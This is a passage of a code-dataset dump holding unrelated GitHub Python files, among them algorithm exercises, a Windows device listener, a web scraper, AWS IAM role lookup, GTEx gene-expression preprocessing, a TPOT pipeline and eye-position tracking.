'')\n\n\n","repo_name":"boopo/boopo-kxz","sub_path":"App/apis/library/library_api.py","file_name":"library_api.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"29377530662","text":"\"\"\"\n给定一个整数数组 nums ,找到一个具有最大和的连续子数组(子数组最少包含一个元素),返回其最大和。\n\n示例:\n\n输入: [-2,1,-3,4,-1,2,1,-5,4]\n输出: 6\n解释: 连续子数组 [4,-1,2,1] 的和最大,为 6。\n进阶:\n\n如果你已经实现复杂度为 O(n) 的解法,尝试使用更为精妙的分治法求解。\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/maximum-subarray\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass Solution:\n def maxSubArray(self, nums):\n nums_sum = nums[0]\n max_nums_sum = nums[0]\n for i in range(1,len(nums)):\n if nums_sum<0:\n nums_sum = nums[i]\n else:\n nums_sum = nums_sum + nums[i]\n max_nums_sum = max(max_nums_sum, nums_sum)\n return max_nums_sum\n\n\nif __name__ == \"__main__\":\n solu = Solution()\n nums = [-2,1,-3,4,-1,2,1,-5,4]\n print(solu.maxSubArray(nums))\n\n\n\n","repo_name":"996426872/python_q_a","sub_path":"算法与数据结构/动态规划/最大子序和.py","file_name":"最大子序和.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17503644782","text":"import win32con\nimport win32api\nimport win32gui\nimport ctypes\nimport ctypes.wintypes\n\nif __name__ == \"__main__\":\n import threading\n\n\nclass HARDWARESTRUCT(ctypes.Structure):\n _fields_ = [\n ('dbch_size', ctypes.wintypes.DWORD),\n ('dbch_devicetype', ctypes.wintypes.DWORD),\n ('dbch_reserved', ctypes.wintypes.DWORD)\n ]\n\nPHARDWARESTRUCT = ctypes.POINTER(HARDWARESTRUCT)\n\n\nclass Listener(object):\n\n def __init__(self):\n mapping = {\n win32con.WM_DEVICECHANGE: self.event_handler\n }\n wc = win32gui.WNDCLASS()\n wc.lpfnWndProc = mapping\n wc.lpszClassName = 'MyWindowClass'\n hinst = wc.hInstance = win32api.GetModuleHandle(None)\n classAtom = win32gui.RegisterClass(wc)\n self.hwnd = win32gui.CreateWindow(\n classAtom,\n \"\",\n 0,\n 0,\n 0,\n win32con.CW_USEDEFAULT,\n win32con.CW_USEDEFAULT,\n 0,\n 0,\n hinst,\n None\n )\n\n def device_state_changed(self, connected=True):\n raise NotImplementedError\n\n def start_listening(self):\n win32gui.PumpMessages()\n\n def event_handler(self, hwnd, uMsg, wParam, lParam):\n if wParam == 0x8000 or wParam == 0x8004:\n data = ctypes.cast(lParam, PHARDWARESTRUCT)\n devicetype = data.contents.dbch_devicetype\n\n if devicetype == 0x2:\n # print \"Device changed :)\"\n self.device_state_changed(\"add\" if wParam == 0x8000 else \"remove\")\n\ndef listen():\n l = Listener()\n l.start_listening()\n\nif __name__ == \"__main__\":\n t = threading.Thread(target=listen)\n t.start()","repo_name":"matthewelse/lmtools","sub_path":"lmtools/lmtoolswin/notify.py","file_name":"notify.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"71574574133","text":"import solver\nfrom matplotlib import pyplot\nfrom matplotlib import rc\n\nif __name__ == '__main__':\n # rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})\n rc('text', usetex=True)\n\n ode = input(\"ode \")\n x0 = float(input(\"x0 \"))\n y0 = float(input(\"y(x0) \"))\n xn = float(input(\"xn \"))\n xk = float(input(\"xk \"))\n print(solver.toRpn(ode))\n data = solver.rungekutta(ode, x0, y0, xn, xk)\n\n print(data)\n\n x = []\n y = []\n\n for d in data:\n x.append(float(d['x']))\n y.append(float(d['y']))\n\n pyplot.title(\"$\\\\displaystyle y\\'=\" + solver.formula_buitifier(ode) + \"$ solution\", fontsize=16)\n pyplot.plot(x, y)\n pyplot.show()\n","repo_name":"alexbatashev/rungekutta","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21504592167","text":"#Mohammed Abdulkadir\n#CS491 Adv python\n#HW_W12\n\nfrom __future__ import print_function\nfrom bs4 import BeautifulSoup\nimport requests\n\nclass fact_directory(object):\n\n def __init__(self, url=\"\",page=\"\",bsoup=\"\"):\n self.url = url\n self.page = page\n self.bsoup = bsoup\n\n def connect(self):\n self.page = requests.get(self.url)\n\n def get_staffinfo(self):\n #this function will scrape the link from the faculty directory\n bsoup = BeautifulSoup(self.page.text, 'html.parser')\n\n #finds all 'div' tags with faculty info\n directory_array = bsoup.find_all('div', class_='people-wrapper')\n directory_array2 = bsoup.find_all('div', class_='department')\n directory_array3 = bsoup.find_all('div', class_='person-contact')\n directory_array4 = bsoup.find_all('div', class_='summary')\n \n #if faculty is found, pull information from website\n for i in directory_array:\n name = i.find('h3').text\n position = i.find('h4').text\n info = i.find('p').text\n web = i.find('a href')\n print(\"Name:\", name)\n print(\"Position:\", position)\n print(info)\n print(\"Website:\", web)\n print(\"**********************************************************\", sep=\"\")\n\n def null_filler(self, fun_arr):\n #check if all infomations are available if not N/A\n\n data = []\n for p_row in fun_arr:\n output = p_row.text.encode('utf-8').strip()\n if not output:\n output = \"N/A\"\n data.append(output)\n else:\n data.append(output)\n return data\n\nif __name__ == \"__main__\":\n #faculy page from class\n start = fact_directory(\"http://cs.siu.edu/faculty-staff/continuing_faculty.php\")\n #function connect() from class fact_directory\n start.connect()\n #function get_staffinfo() from class fact_directory\n start.get_staffinfo()\n","repo_name":"Andimoh/CS491_Advanced-Python","sub_path":"hw_w12/abdulkadir_fac_directory.py","file_name":"abdulkadir_fac_directory.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10363644951","text":"import subprocess\r\n\r\ndef search_role():\r\n with open('instance_profiles.txt', 'r') as f:\r\n in_pr = [line.replace('\\n', '') for line in f]\r\n \r\n for i in in_pr:\r\n try:\r\n role_res = subprocess.call(['aws', 'iam', 'get-instance-profile', '--instance-profile-name', f'{i}', '--query', \\\r\n 'InstanceProfile.Roles[].RoleName[]', '--output', 'text']) \r\n except Exception as e:\r\n print(e)\r\n \r\nif __name__ == \"__main__\":\r\n search_role()\r\n","repo_name":"ekhanu101/SSM-policy-scanner","sub_path":"get_roles.py","file_name":"get_roles.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10423825802","text":"\"\"\"\nhttps://codingcompetitions.withgoogle.com/codejam/round/000000000019fef2/00000000002d5b62\nNo idea what went wrong here. Something's giving a non-minimal answer, or saying\nit's impossible when it's not.\n\"\"\"\n\n\ndef expand(x):\n if x == 0:\n return ((0, 0),)\n digits = \"{0:b}\".format(abs(x))\n d = len(digits)\n solns = []\n\n solns.append((abs(x), 0) if x > 0 else (0, abs(x)))\n\n for i in range(0, 30):\n candidate_diff = abs(abs(x) - 2 ** i)\n # Share a digit?\n # print(\"{0:b} {1:b}\".format(candidate_diff, 2 ** i))\n # print(2 ** i, candidate_diff)\n solns.append((2 ** i, candidate_diff) if x > 0 else (candidate_diff, 2 ** i))\n\n # for a, b in solns:\n # assert a - b == x, (a, b, x)\n\n return ((a, b) for a, b in solns if a - b == x)\n # return solns\n\n\ndef to_str(p1, n1, p2, n2):\n ns = \"{0:b}\".format(p2)\n ss = \"{0:b}\".format(n2)\n es = \"{0:b}\".format(p1)\n ws = \"{0:b}\".format(n1)\n digits = max(len(dir_) for dir_ in (ns, es, ss, ws))\n while len(ns) < digits:\n ns = \"0\" + ns\n while len(ss) < digits:\n ss = \"0\" + ss\n while len(es) < digits:\n es = \"0\" + es\n while len(ws) < digits:\n ws = \"0\" + ws\n\n # raise Exception(ns, es, ss, ws)\n # print(digits)\n str_ = []\n for i in range(-1, -digits - 1, -1):\n # print(i)\n if ns[i] == \"1\":\n str_.append(\"N\")\n elif ss[i] == \"1\":\n str_.append(\"S\")\n elif es[i] == \"1\":\n str_.append(\"E\")\n if ws[i] == \"1\":\n str_.append(\"W\")\n # print(str_)\n return \"\".join(str_)\n\n\ndef solve_case(x, y):\n combs = [(a, b) for a in expand(x) for b in expand(y)]\n\n min_sol = None\n for ((p1, n1), (p2, n2)) in combs:\n if all(c == \"1\" for c in \"{0:b}\".format(p1 + p2 + n1 + n2)):\n # It's a soln.\n sol = to_str(p1, n1, p2, n2)\n # check(sol, x, y)\n if not min_sol or len(sol) < len(min_sol):\n # It's minimal\n min_sol = sol\n\n return min_sol or \"IMPOSSIBLE\"\n\n # print(\"{0:b} {1:b} {2:b} {3:b}\".format(*min_sol))\n\n\ndef check(str_, realx, realy):\n x, y = (0, 0)\n if str_ == \"IMPOSSIBLE\":\n return\n for i, c in enumerate(str_):\n if c == \"N\":\n y = y + 2 ** i\n if c == \"S\":\n y = y - 2 ** i\n if c == \"E\":\n x = x + 2 ** i\n if c == \"W\":\n x = x - 2 ** i\n assert (x, y) == (realx, realy), (x, y)\n\n\ndef run():\n cases = int(input())\n for i in range(1, cases + 1):\n x, y = (int(x) for x in input().split(\" \"))\n soln = solve_case(x, y)\n print(\"Case #{}: {}\".format(i, soln), flush=True)\n check(soln, x, y)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"dprgarner/codejam","sub_path":"2020/round_1b/expogo.py","file_name":"expogo.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12880677945","text":"#List Comprehension\n\nnum = [1, 2, 3, 4]\nnew_list = [n+1 for n in num]\nprint(new_list)\n\nnum_2 = [68, 419]\nnew_list_2 = [n+1 for n in num_2]\nprint(new_list_2)\n\nname = 'Okabe'\nnew_name = print([n for n in name])\n\nnew_double = [n*2 for n in range(1, 5)]\nprint(new_double)\n\nthe_names = ['Okarinnn', 'Shizume', 'Daru', 'Maho', 'Mikasa', 'Eren Yeger']\nnew_names = [name for name in the_names if len(name)<9]\nprint(new_names)\n\ncap_names = [name.upper() for name in the_names if len(name)>5]\nprint(cap_names)","repo_name":"manthanoice/Python-100","sub_path":"Day-26/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36433820387","text":"# -*- coding: UTF-8 -*-\nimport pandas as pd\nimport csv\nimport pymysql\n\nuser = \"root\"\npassword = \"928457\"\n\ndef score(ch):\n if ch == 'A':\n return 95\n elif ch == 'B':\n return 85\n elif ch == 'C':\n return 75\n else:\n return 65\n\ndef func():\n quality = []\n lecture = []\n answer = []\n # 预处理前数据\n #data = pd.read_csv('One/score.csv')\n conn = pymysql.connect(host=\"localhost\", user=user, password=password, database=\"machine\")\n data = pd.read_sql(\"select * from score\",con=conn)\n desc = data.describe()\n data1 = []\n for i, row in desc.iterrows():\n data1.append({'num':str(row[0]), 'name':str(row[1]), 'ppt':str(row[2]),\n 'jiangjie':str(row[3]), 'answer':str(row[4]), 'class':str(row[5])})\n\n # 进行预处理\n with open(r'One/score.csv', encoding='UTF-8') as f:\n f_csv = csv.reader(f)\n samples = []\n rowCount = 0\n for row in f_csv:\n rowCount += 1\n if rowCount >= 3:\n isBlank = 0\n sample = []\n for i in range(len(row)):\n if row[i] == '':\n isBlank = 1\n if i <= 4 and i >= 2:\n sample.append(score(row[i]))\n elif i == (len(row) - 1) and row[i] != '':\n sample.append(row[i].split(':')[1])\n else:\n sample.append(row[i])\n if isBlank == 0:\n samples.append(sample)\n # print(sample)\n quality.append(sample[2])\n lecture.append(sample[3])\n answer.append(sample[4])\n # 预处理后数据\n dd = pd.DataFrame(samples)\n desc2 = dd.describe()\n data2 = []\n for i in range(len(desc2)):\n data2.append({'one': str(desc2.iloc[i, 0]), 'two': str(desc2.iloc[i, 1]),\n 'three': str(desc2.iloc[i, 2])})\n # 进行统计\n quality = [quality.count(95), quality.count(85), quality.count(75), quality.count(65)]\n lecture = [lecture.count(95), lecture.count(85), lecture.count(75), lecture.count(65)]\n answer = [answer.count(95), answer.count(85), answer.count(75), answer.count(65)]\n f.close()\n return (quality,lecture,answer,data1,data2)\n\n\n\n\n\n\n\n","repo_name":"wangliang1998/MLVP","sub_path":"back/One/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21164487303","text":"# 天气信息 从网页控制台f12获取的,好多人说免费无限制使用,不管了,先用着\ntime_st = round(time.time())\nurl = f\"http://d1.weather.com.cn/sk_2d/{city_id}.html?_={time_st}\"\n\n# 这里不加headers 会出现403,把请求头对比了一遍发现多了这个参数\ntemp_r = requests.get(url,headers={\"Referer\":\"https://m.weather.com.cn\"}) \ntemp_r.encoding = \"utf-8\"\n\nprint(temp_r.text)\n\n# 城市id可以从这里获取,里面有sql文件,改一下就直接入库了\n# 也可以直接用里面的json数据\n# http://81.70.62.148/weather_api.zip\n","repo_name":"ichengi/LittleScript","sub_path":"apicol/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2258123581","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.linear_model import ElasticNetCV, RidgeCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.pipeline import make_pipeline, make_union\nfrom sklearn.preprocessing import Normalizer\nfrom tpot.builtins import StackingEstimator\nfrom tpot.export_utils import set_param_recursive\nfrom data_info import *\nfrom preprocessing_helpers import *\n\n\nnew_sj_norm = [\n 'precipitation_amt_mm',\n 'reanalysis_air_temp_k',\n 'reanalysis_avg_temp_k',\n 'reanalysis_max_air_temp_k',\n 'reanalysis_min_air_temp_k',\n 'reanalysis_precip_amt_kg_per_m2',\n 'reanalysis_relative_humidity_percent',\n 'reanalysis_sat_precip_amt_mm',\n 'station_avg_temp_c',\n 'station_max_temp_c',\n 'station_min_temp_c',\n 'station_precip_mm'\n]\nnew_sj_scale = [\n 'weekofyear',\n]\n\nextra_sj_cols = [\n]\n\nnew_sj_cols = [LABEL_COLUMN] + CATEGORICAL_COLUMNS + new_sj_norm + new_sj_scale + extra_sj_cols + [DATETIME_COLUMN]\nnew_sj_cols_no_label = CATEGORICAL_COLUMNS + new_sj_norm + new_sj_scale + extra_sj_cols + [DATETIME_COLUMN]\nsj_datasets, sj_norm_scale = generate_lstm_data(\n test_file,\n single_step=True,\n history_size=24,\n cols=new_sj_cols_no_label,\n norm_cols=new_sj_norm,\n scale_cols=new_sj_scale,\n extra_columns=extra_sj_cols,\n prepend_with_file=train_file,\n train_frac=1.0\n)\nsj_train_x, sj_train_y = sj_datasets[0][0]\nsj_train_x = sj_train_x.reshape(sj_train_x.shape[0], sj_train_x.shape[1] * sj_train_x.shape[2])\nprint(np.size(sj_train_x))\n# NOTE: Make sure that the outcome column is labeled 'target' in the data file\n# tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR', dtype=np.float64)\n# features = tpot_data.drop('target', axis=1)\ntraining_features, testing_features, training_target, testing_target = \\\n train_test_split(sj_train_x, sj_train_y, random_state=42)\nprint(np.size(training_features))\n\n# Average CV score on the training set was: -18.091824133868496\nexported_pipeline = make_pipeline(\n Normalizer(norm=\"l2\"),\n StackingEstimator(estimator=ElasticNetCV(l1_ratio=0.25, tol=0.01)),\n StackingEstimator(estimator=RidgeCV()),\n RandomForestRegressor(bootstrap=True, max_features=0.4, min_samples_leaf=6, min_samples_split=14, n_estimators=100)\n)\n# Fix random state for all the steps in exported pipeline\nset_param_recursive(exported_pipeline.steps, 'random_state', 42)\n\nexported_pipeline.fit(training_features, training_target)\nresults = exported_pipeline.predict(testing_features)\n\n\npreds = np.concatenate((results, np.zeros(156)), axis=None)\nexport_test_to_csv(predictions=results,path=test_file, prefix='rf')","repo_name":"burnpiro/dengai-predicting-disease-spread","sub_path":"tpot_denga_pipeline3.py","file_name":"tpot_denga_pipeline3.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27323893202","text":"import os\nfrom pathlib import Path\n\ndef show_env(mod_name):\n django_settings = Path(os.environ['DJANGO_SETTINGS_MODULE']).name\n projroot = str(Path(__file__).parent.parent.parent)\n p = Path(os.environ.get('PVZDLIB_CONFIG_MODULE', 'DEFAULT'))\n pvzdlib_settings = str(p)[len(projroot)+1:] # reduce to path relative to project root\n print(f\"\\ntestenv/{mod_name}: DJANGO_SETTINGS_MODULE={django_settings}; \"\n f\"PVZDLIB_CONFIG_MODULE={pvzdlib_settings}\")\n\n","repo_name":"identinetics/PVZDweb","sub_path":"common/show_env.py","file_name":"show_env.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16008389373","text":"from collections import deque\nfrom statistics import mean\nfrom collections import deque\nimport math\n\nimport numpy as np\n\n\nclass PositionCalculator:\n LEFT_EYE_INDEX = 0\n RIGHT_EYE_INDEX = 1\n REAL_IPD = 6.5 # cm. Physical distance between my pupils\n\n RELATIVE_EYE_POSITION_OFFSET = (\n -0.5\n ) # This is to ensure that relative coords origin is at center of image instead of top-left.\n\n def __init__(self):\n self.xPositionQueue = deque([0] * 10, 10)\n self.yPositionQueue = deque([0] * 10, 10)\n self.zPositionQueue = deque([0] * 10, 10)\n\n self.leftEyeXQueue = deque([], 3)\n self.leftEyeYQueue = deque([], 3)\n self.rightEyeXQueue = deque([], 3)\n self.rightEyeYQueue = deque([], 3)\n\n self.allSmoothQs = [\n self.leftEyeXQueue,\n self.leftEyeYQueue,\n self.rightEyeXQueue,\n self.rightEyeYQueue,\n ]\n\n def convertBoundingBoxWidthToDistance(self, width): # distance in CM!\n CENTIMETERS_PER_INCH = 2.54\n a, b, c, d = -0.000003372072338, 0.002878979776, -0.8792663751, 114.0018076\n distance = a * pow(width, 3) + b * pow(width, 2) + c * width + d\n return distance * CENTIMETERS_PER_INCH\n\n def calcIPD(self, detection, image_height, image_width):\n \"calcs virtual IPD. Real IPD is 13.5cm\"\n if not detection or not detection.location_data:\n return -1\n\n left_pt = detection.location_data.relative_keypoints[self.LEFT_EYE_INDEX]\n right_pt = detection.location_data.relative_keypoints[self.RIGHT_EYE_INDEX]\n\n xdistsq = pow(left_pt.x * image_width - right_pt.x * image_width, 2)\n ydistsq = pow(left_pt.y * image_height - right_pt.y * image_height, 2)\n\n dist = math.sqrt(xdistsq + ydistsq)\n return math.floor(dist)\n\n def calcXYPosition(self, detection, image_height, image_width, virt_ipd):\n \"\"\"\n Calcs the real world X and Y coordinates of the point located mid way between eyes\n Does not account for \"fish-eye\" effect of camera lens. There will be more error the further away\n we move from the center of the image.\n \"\"\"\n\n left_eye_pt, right_eye_pt = self.getRelativeEyePosition(detection)\n\n mid_x = left_eye_pt.x + abs(right_eye_pt.x - left_eye_pt.x) // 2\n mid_y = left_eye_pt.y + abs(right_eye_pt.y - left_eye_pt.y) // 2\n\n mid_x_px = mid_x * image_width\n mid_y_px = mid_y * image_height\n\n cm_per_px = self.REAL_IPD / virt_ipd\n\n return mid_x_px * cm_per_px, mid_y_px * cm_per_px\n\n def calcPosition(self, detection, image_height, image_width):\n \"\"\"\n Define Origin as webcam position. Positive Z is towards viewer. +X is to the right of user-perspective. +Y is \"down\".\n \"\"\"\n bBox = detection.location_data.relative_bounding_box\n\n boundBox = (\n int(bBox.xmin * image_width),\n int(bBox.ymin * image_height),\n int(bBox.width * image_width),\n int(bBox.height * image_height),\n )\n\n z = self.convertBoundingBoxWidthToDistance(boundBox[2]) # cm\n\n virt_ipd = self.calcIPD(detection, image_height, image_width)\n\n x, y = self.calcXYPosition(detection, image_height, image_width, virt_ipd) # cm\n\n return x, y, z\n\n def smoothPosition(self, raw_x, raw_y, raw_z):\n \"\"\"\n applies smoothing functions to raw x, y and z positions\n \"\"\"\n self.xPositionQueue.append(raw_x)\n self.yPositionQueue.append(raw_y)\n self.zPositionQueue.append(raw_z)\n\n means = (\n mean(self.xPositionQueue),\n mean(self.yPositionQueue),\n mean(self.zPositionQueue),\n )\n\n return [float(f\"{x:.1f}\") for x in means]\n\n def positionSmoothingFunc(self, q):\n return int(mean(q))\n\n def getRelativeEyePosition(self, detection):\n left_eye_pt = detection.location_data.relative_keypoints[\n self.LEFT_EYE_INDEX\n ].__deepcopy__()\n left_eye_pt.x += self.RELATIVE_EYE_POSITION_OFFSET\n left_eye_pt.y += self.RELATIVE_EYE_POSITION_OFFSET\n\n right_eye_pt = detection.location_data.relative_keypoints[\n self.RIGHT_EYE_INDEX\n ].__deepcopy__()\n right_eye_pt.x += self.RELATIVE_EYE_POSITION_OFFSET\n right_eye_pt.y += self.RELATIVE_EYE_POSITION_OFFSET\n\n return left_eye_pt, right_eye_pt\n\n def smoothEyePositions(self, detection, image_height, image_width):\n left_eye_pt = detection.location_data.relative_keypoints[self.LEFT_EYE_INDEX]\n right_eye_pt = detection.location_data.relative_keypoints[self.RIGHT_EYE_INDEX]\n self.rightEyeXQueue.append(int(right_eye_pt.x * image_width))\n self.rightEyeYQueue.append(int(right_eye_pt.y * image_height))\n\n self.leftEyeXQueue.append(int(left_eye_pt.x * image_width))\n self.leftEyeYQueue.append(int(left_eye_pt.y * image_height))\n\n out = [self.positionSmoothingFunc(x) for x in self.allSmoothQs]\n\n return (out[0], out[1]), (out[2], out[3])\n","repo_name":"adewinter/perspective","sub_path":"python/position_calculator.py","file_name":"position_calculator.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19973974006","text":"import numpy as np\n\nfrom simple_3dviz import Mesh, Lines\nfrom simple_3dviz.window import show\n\n\ndef heart_voxel_grid(N):\n \"\"\"Create a NxNxN voxel grid with True if the voxel is inside a heart\n object and False otherwise.\"\"\"\n x = np.linspace(-1.3, 1.3, N)\n y = np.linspace(-1.3, 1.3, N)\n z = np.linspace(-1.3, 1.3, N)\n x, y, z = np.meshgrid(x, y, z)\n return (2*x**2 + y**2 + z**2-1)**3 - (1/10) * x**2*z**3 - y**2*z**3 < 0\n\n\nif __name__ == \"__main__\":\n voxels = heart_voxel_grid(64)\n m = Mesh.from_voxel_grid(voxels, colors=(0.8, 0, 0))\n l = Lines.from_voxel_grid(voxels, colors=(0, 0, 0.), width=0.001)\n show([l, m])\n","repo_name":"angeloskath/simple-3dviz","sub_path":"examples/render_line_voxels.py","file_name":"render_line_voxels.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":115,"dataset":"github-code","pt":"21"} +{"seq_id":"20682205367","text":"import os\nimport random\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\ng_write_df = True\n\nprint(\"+ This will take about 10 minutes with a power laptop, but requires a lot of memory for doing a groupby median on the gene expression\")\nprint(\"+ Results in annotated geneset that is compatible with other datasets, like TCGA and TARGET\")\nprint(\"\"\"+ First run: \n get_gtex.sh\n\"\"\")\n\n# Commit from https://github.com/cognoma/genes\n# use this to make a compatible geneset annotation (thanks, Biobombe!)\ngenes_commit = 'ad9631bb4e77e2cdc5413b0d77cb8f7e93fc5bee'\n\ndef get_gene_df():\n url = 'https://raw.githubusercontent.com/cognoma/genes/{}/data/genes.tsv'.format(genes_commit)\n gene_df = pd.read_table(url)\n\n # Only consider protein-coding genes\n gene_df = (\n gene_df.query(\"gene_type == 'protein-coding'\")\n )\n return gene_df\n\ndef get_old_to_new_entrez_ids():\n # Load gene updater - old to new Entrez gene identifiers\n url = 'https://raw.githubusercontent.com/cognoma/genes/{}/data/updater.tsv'.format(genes_commit)\n updater_df = pd.read_table(url)\n old_to_new_entrez = dict(zip(updater_df.old_entrez_gene_id,\n updater_df.new_entrez_gene_id))\n return old_to_new_entrez\n\n\nrandom.seed(1234)\nos.makedirs(\"data/gtex\",exist_ok=True)\n\nattr_path = 'dist/gtex/GTEx_Analysis_v8_Annotations_SampleAttributesDS.txt'\nattr_df = pd.read_table(attr_path)\n\n###### Process the gene expression data\n\n# This involves updating Entrez gene ids, sorting and subsetting\n\nprint(\"+ Read gene expression - this takes a little while\")\nos.makedirs(f\"data/gtex\",exist_ok=True)\nexpr_path = 'dist/gtex/GTEx_Analysis_2017-06-05_v8_RNASeQCv1.1.9_gene_tpm.gct.gz'\nexpr_df = pd.read_table(expr_path, sep='\\t', skiprows=2, index_col=1)\n\n\nprint(\"+ Get GTEx gene mapping\")\nexpr_gene_ids = (\n expr_df\n .loc[:, ['Name']]\n .reset_index()\n .drop_duplicates(subset='Description')\n)\nprint(\"+ Perform inner merge gene df to get ensembl to entrez mapping\")\ngene_df=get_gene_df()\nmap_df = expr_gene_ids.merge(gene_df, how='inner', left_on='Description', right_on='symbol')\nprint(\"+ Save map, expression dataframes\")\nif g_write_df:\n map_df.reset_index().to_feather(f\"data/gtex/map.ftr\") # if you run out of memory, this will load fast\nelse:\n print(\"+ ! don't write map.ftr\")\n\n\n# transform expression matrix\nprint(\"+ *Drop 'Name' column...\")\nexpr_df=expr_df.drop(['Name'], axis='columns')\nprint(\"+ *Drop any rows with 'na's...\")\nexpr_df=expr_df.dropna(axis='rows')\nprint(\"+ * Use groupby to collapse duplicate genes by median (199 genes are duplicated, some more than twice, for a total of 1608 values) ...\")\nexpr_df=expr_df.groupby(level=0).median()\nprint(\"+ *reindex map...\")\nexpr_df=expr_df.reindex(map_df.symbol)\nsymbol_to_entrez = dict(zip(map_df.symbol, map_df.entrez_gene_id))\nprint(\"+ *rename...\")\nexpr_df=expr_df.rename(index=symbol_to_entrez)\nprint(\"+ *rename again...\")\nexpr_df=expr_df.rename(index=get_old_to_new_entrez_ids()) # add in gene annotations\nprint(\"+ *transpose...\")\nexpr_df = expr_df.transpose()\nprint(\"+ *sort by row...\")\nexpr_df = expr_df.sort_index(axis='rows')\nprint(\"+ *sort by columns...\")\nexpr_df = expr_df.sort_index(axis='columns')\nprint(\"+ rename index\")\nexpr_df.index.rename('sample_id', inplace=True)\n\n# change gene integer ids to strings so feather will accept column names \nexpr_df.columns=expr_df.columns.astype(str)\n\nif g_write_df:\n print(\"+ write expr one more time\")\n expr_df.reset_index().to_feather(f\"data/gtex/expr.ftr\")\n file=f\"data/gtex/gene_ids.txt\"\n print(f\"+ Write out gene ids in order ({file})\")\n with open(file,\"a\") as f:\n for col in expr_df.columns:\n f.write(f\"{col}\\n\")\nelse:\n print(\"++ ! Didn't write expr.fltr\")\n print(\"++ ! Didn't write gene_ids_txt\")\n\nprint(\"+ Write out superclass names\")\n\nprint(\"++ Change attr tissue type names to something directory-friendly\")\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.strip()\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.replace(' - ','-')\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.replace(' \\(','__').replace('\\)','__')\nattr_df[\"SMTS\"] = attr_df[\"SMTS\"].str.replace(' ','_')\n\nclass_names=set(attr_df[\"SMTS\"])\nprint(f\"++ Class names set: {class_names}\")\n\nif g_write_df:\n attr_df[[\"SAMPID\",\"SMTS\"]].to_csv(f\"data/gtex/sample_id-superclass_name.tsv\", sep=\"\\t\", index=False, header=False)\nelse:\n print(\"++ ! Didn't write sample_id-superclass_name.tsv\")\n\n\nprint(\"+ Create dir structure for classes\")\nos.makedirs(f'data/gtex', exist_ok=True)\nfor cls in class_names:\n os.makedirs(f\"data/gtex/{cls}\",exist_ok=True)\n\nprint(f\"+ Create a numpy for each row, write to data/gtex, separate out later\")\nimport gzip\nimport numpy as np\nfor idx, nparray in enumerate(np.array(expr_df.iloc[:])):\n nparray=nparray.astype(np.float16)\n sample_id=expr_df.index[idx]\n cls=attr_df.loc[attr_df[\"SAMPID\"]==sample_id, \"SMTS\"].iloc[0]\n if g_write_df:\n with gzip.GzipFile(f\"data/gtex/{cls}/{sample_id}.npy.gz\", \"w\") as f:\n np.save(file=f, arr=nparray)\n else:\n print(f\"Didn't write {sample_id}.py.gz.\")\n\nstrat = attr_df.set_index('SAMPID').reindex(expr_df.index).SMTSD\ntissuetype_count_df = (\n pd.DataFrame(strat.value_counts())\n .reset_index()\n .rename({'index': 'tissuetype', 'SMTSD': 'n ='}, axis='columns')\n)\n\nfile = f'data/gtex/superclass-count.tsv'\nprint(f\"+Write tissue type counts {file}\")\nif g_write_df:\n tissuetype_count_df.to_csv(file, sep='\\t', index=False)\nelse:\n print(f\"Didn't write {file}\")\n\nprint(f\"+ tissue type counts: {tissuetype_count_df}\")\n\nprint(\"\"\"+ Reload each observation like such:\nimport gzip\nimport numpy as np\nwith gzip.GzipFile(f'data/gtex//.npy.gz') as f:\n obs=np.load(f)\n\"\"\")\n\n\n","repo_name":"krobasky/tiscla","sub_path":"src/gtex-preprocess.py","file_name":"gtex-preprocess.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18778021616","text":"import json\r\nimport numpy as np\r\nfrom collections import OrderedDict\r\nfrom annoy import AnnoyIndex\r\nfrom build import build,getKeyword,getVectors\r\n\r\ndef main():\r\n with 